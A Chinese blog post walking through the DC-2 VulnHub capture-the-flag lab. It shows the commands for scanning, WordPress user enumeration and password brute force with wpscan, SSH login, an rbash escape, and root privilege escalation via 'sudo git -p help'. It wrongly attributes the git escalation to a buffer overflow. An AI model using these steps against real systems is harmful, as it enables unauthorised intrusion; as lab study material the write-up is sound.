DC-2

最新推荐文章于 2024-03-03 20:01:53 发布
最新推荐文章于 2024-03-03 20:01:53 发布
阅读量1.5k 收藏 1
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45102820/article/details/116380954
版权

1.arp-scan -l 扫描局域网所有设备

  • 查到DC-2的ip

2.nmap端口扫描

  • nmap[扫描类型][设置][设备地址]
    -命令: nmap -sV -p- 192.168.224.132
  • -sV 系统版本检测
  • -p 指定的端口

3.修改host文件,

dc-2

C:\Windows\System32\drivers\etc

  • 在网络上访问网站,要首先通过DNS服务器把网络域名(www.XXXX.com)解析成XXX.XXX.XXX.XXX的IP地址后,我们的计算机才能访问。要是对于每个域名请求我们都要等待域名服务器解析后返回IP信息,这样访问网络的效率就会降低,而Hosts文件就能提高解析效率。根据Windows系统规定,在进行DNS请求以前,Windows系统会先检查自己的Hosts文件中是否有这个地址映射关系,如果有则调用这个IP地址映射,如果没有再向已知的DNS 服务器提出域名解析。也就是说Hosts的请求级别比DNS高。
    其作用就是将一些常用的网址域名与其对应的IP地址建立一个关联“数据库”,当用户在浏览器中输入一个需要登录的网址时,系统会首先自动从Hosts文件中寻找对应的IP地址,一旦找到,系统会立即打开对应网页,如果没有找到,则系统会再将网址提交DNS域名解析服务器进行IP地址的解析。

4.提示我们使用cewl(字典生成工具)生成一个通用的字典,并告诉了我们flag的位置

cewl

cewl [url] [options]

命令:cewl dc-2/ -w result.txt

-w:指定结果输出文件

5.wpscan工具进行扫描用户

wpscan

  • 1.Wpscan

    WPScan是一个扫描WordPress漏洞的黑盒子扫描器,可以扫描出wordpress的版本,主题,插件,后台用户以及爆破后台用户密码等。

  • 2.Wordpress

    WordPress是一种使用PHP语言和MySQL数据库开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。也可以把 WordPress当作一个内容管理系统(CMS)来使用。WordPress有许多第三方开发的免费模板,安装方式简单易用

命令:wpscan --url http://dc-2 --enumerate u

暴力枚举用户名

–enumerate选项来扫描并发现关于目标站点主题、插件和用户名信息

6.dirb–目录扫描

此时还没有拿到网站的后台路径,扫后台。这里用dirb Web内容扫描扫描工具

dirb http(s)://url(ip)可挖掘被测网站的目录信息

命令:dirb http://dc-2

该工具根据用户提供的字典,对目标网站目录进行暴力猜测。它会尝试以递归方式进行爆破,以发现更多的路径。同时,该工具支持代理、HTTP认证扫描限制访问的网站


7.通过已经扫描到的用户名和密码对目标主机进行爆破

命令:wpscan --url dc-2 -U user.txt -P result.txt

用得到的两个用户名和密码登录。在jerry的账号里面拿到第二个flag,第二的flag的意思是如果你无法找到利用WordPress的捷径,还有另外一种方法,希望你能找到另一种方法。


8、根据提示,我们换一个思路,上面nmap的结果还有7744端口ssh服务。

尝试使用之前爆破出来的用户名密码登陆SSH尝试ssh远程登录,最终tom成功登录

ssh jerry@192.168.224.132 -p 7744

发现flag3


9.rbash绕过

rbash(The restricted mode of bash),也就是限制型bash;是平时所谓的 restricted shell的一种,也是最常见的 restricted shell

查看可以使用的命令:
echo $PATH
echo /home/tom/usr/bin/*

rbash绕过

方法一:
绕过命令:BASH_CMDS[a]=/bin/sh;a
用/bin/bash进入bash

配置环境变量:
PATH:定义命令行解释器搜索用户执行命令的路径

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

方法二:

vi绕过

vi:set shell=/bin/sh

运行shell:shell
export PATH=/usr/sbin:/usr/bin:/sbin:/bin


10.Git提权

切换到jerry家目录cd /home/jerry,找到flag4

sudo -l:列出用户能以sudo方式执行的所有命令;

这里用git提权,原理是git存在缓冲区溢出漏洞,在使用sudo git -p help时,不需要输入root密码即可以root权限执行这条命令

sudo git -p help

!/bin/bash

Y丶bs
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
有效的域名后缀列表
weixin_33888907的博客
11-15 8016
# Version 2016060300, Last Updated Fri Jun 3 07:07:01 2016 UTCAAAAARPABBABBOTTABBVIEABOGADOABUDHABIACACADEMYACCENTUREACCOUNTANTACCOUNTANTSACOACTIVEACTORADADACADSADULTAEAEGAEROAET...
DC-DC PCB layout 指导.docx
06-18
DC-DC PCB Layout 指导 DC-DC PCB 布局是影响 DC-DC 转换器性能的关键因素之一。与 LDO 相比,DC-DC 电路的布局要求更高,因为它具有更高的噪声和更复杂的电路结构。因此,了解 DC-DC 布局的重要性和设计原则是非常...
关于DC2
gh2663287的博客
06-02 2594
GDI基本概念及思想   编写代码的一般步骤:先用CreateDC创建(或GetDC获取)device content(DC),然后用GetObject获取(或使用创建object的函数创建)需要的object,并用SelectObject将获取的object选入device content(DC),再使用object进行相应的画图操作,最后用SelectObject将原来的object重新选
DC几个基础命令
热门推荐
WDWCSDN123的博客
03-27 3万+
create_clock clk -period 5 -waveform {0,2.5} 创建一个名为clk,周期为5ns,占空比为50%的时钟 set_dont_touch set_dont_touch_network 设置不希望被DC优化的模块,前者 对cell和net都可以使用,后者只能用于net set_clock_transition 设置时钟转换时间,指从时钟高电平的10%到达时钟高...
华为网络技术打卡2(云DC
qq_39789226的博客
01-31 987
云数据中心&&传统数据中心 IBM&AMAZON那次pk:(比较方面) 技术的展现方面; 技术的解决方案方面 服务水平保障方面 (所以我们也可以从这些方面考虑,,,) 【业务高峰时段,是否能够实现快速的水平拓展服务】 - 传统数据中心 特点:孤岛式,烟囱式的纵向拓展 组成:基础设施层,机房配套层,应用软件层,平台软件层。 基础设施层:一套集中对外提供信息服务的IT...
DC系列第二篇
何止的博客
01-07 3201
资源地址:https://download.vulnhub.com/dc/DC-2.zip 本机:192.168.3.15 靶机:192.168.3.18 1. 信息收集 Netdiscover是一种网络扫描工具,通过ARP扫描发现活动主机,可以通过主动和被动两种模式进行ARP扫描。通过主动发送ARP请求检查网络ARP流量,通过自动扫描模式扫描网络地址。 netdiscover netdiscover -i eth0 -r 192.168.3.0/24 masscan 因为虚拟机出问题了ip换成18.
DC-2靶机详解
苏生要努力
03-03 1314
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
DC-2靶机攻略
weixin_43179779的博客
10-16 1810
DC-2靶机攻略
DC-2靶场实战详解
a310034188的博客
11-30 1万+
DC-2 写写自己打DC-2的过程 使用工具 kali DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/ 环境配置。 我这里的话kali和DC-2都是nat模式 kali IP为:192.168.28.139 DC-2 IP设置为nat模式,具体多少暂时也不知道。 信息收集 查找 DC-2 IP arp-scan -l 得到DC-2 IP为:192.168.28.179 扫描开启的端口 nmap -A -p1-65535 198.13.51.
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
DC-DC变换器Simulink仿真模型
08-07
**DC-DC变换器Simulink仿真模型** 在电子工程领域,DC-DC变换器是一种用于改变直流电压的装置,广泛应用于电源管理、电池供电设备、汽车电子系统以及各种嵌入式系统中。Simulink是MATLAB环境下的一个动态系统建模...
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集).zip
05-31
DC-002 DC-005 DC-012 电源接口2D3D三维视图PCB封装库AD库(8个合集) Component Count : 8 Component Name ----------------------------------------------- DC-002 DC-003 DC-003A DC-005 DC-005P DC-012 DC-...
DC-1入门练习
Mr_helloword的博客
07-10 841
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
全国计算机三级(网络技术)做题技巧
07-22
全国计算机三级(网络技术)做题技巧
记录 cocos 开发问题 ,微信 wx.xxx函数 报找不到名称“wx”
07-22
wx api 文件
20231108-173536 时间箭贴板
07-22
时间粘贴小工具 启动后点击回车 可以得到时间字符串 直接粘贴可用
毕业设计javajsp西饼点心店收费系统(ssh)-qrp源码含文档工具包
07-22
毕业设计javajsp西饼点心店收费系统(ssh)-qrp源码含文档工具包 后台是ssh框架,页面是jsp,数据库mysql,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 点心店管理系统是针对点心店内部而设计的,应用于点心店的局域网,这样可以使得点心店内部管理更有效的联系起来。系统的主要功能包括:供货商信息管理、点心信息管理、采购申请管理与物品采购管理。 包含:源码、数据库脚本、论文、开题报告、环境工具包、相同框架项目的安装教程(在说明文档中)
275、基于stm32的电压可调、电流智能检测系统设计(原理图、PCB图、源代码)
最新发布
07-22
275、基于stm32的电压可调、电流智能检测系统设计(原理图、PCB图、源代码) 功能:系统使用stm32单片机设计,USB 5V供电,实现3.3V——12V可调输出,电流测量范围1uA——500mA,液晶LCD12864显示,通过串口上传信息和串口修改输出电压;各功能如下: 1、使用stm32为核心,keil编程; 2、输出3.3V-12V可调电压; 3、输出电流显示在LCD12864上,输出电流检测范围是1uA——500mA; 4、串口同步上传电压和电流信息; 5、支持串口指令修改输出电压值;
高频隔离软开关DC-DC变换技术研究
"2014年电源网年会上,沙德尚博士分享了关于高频隔离软开关DC-DC变换器的研究成果,主要包括全桥+Boost混合式高效率变换器、输入串联输出并联(ISOP)移相全桥全范围软开关变换器以及三电平移相+LLC混合变换器的探讨...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值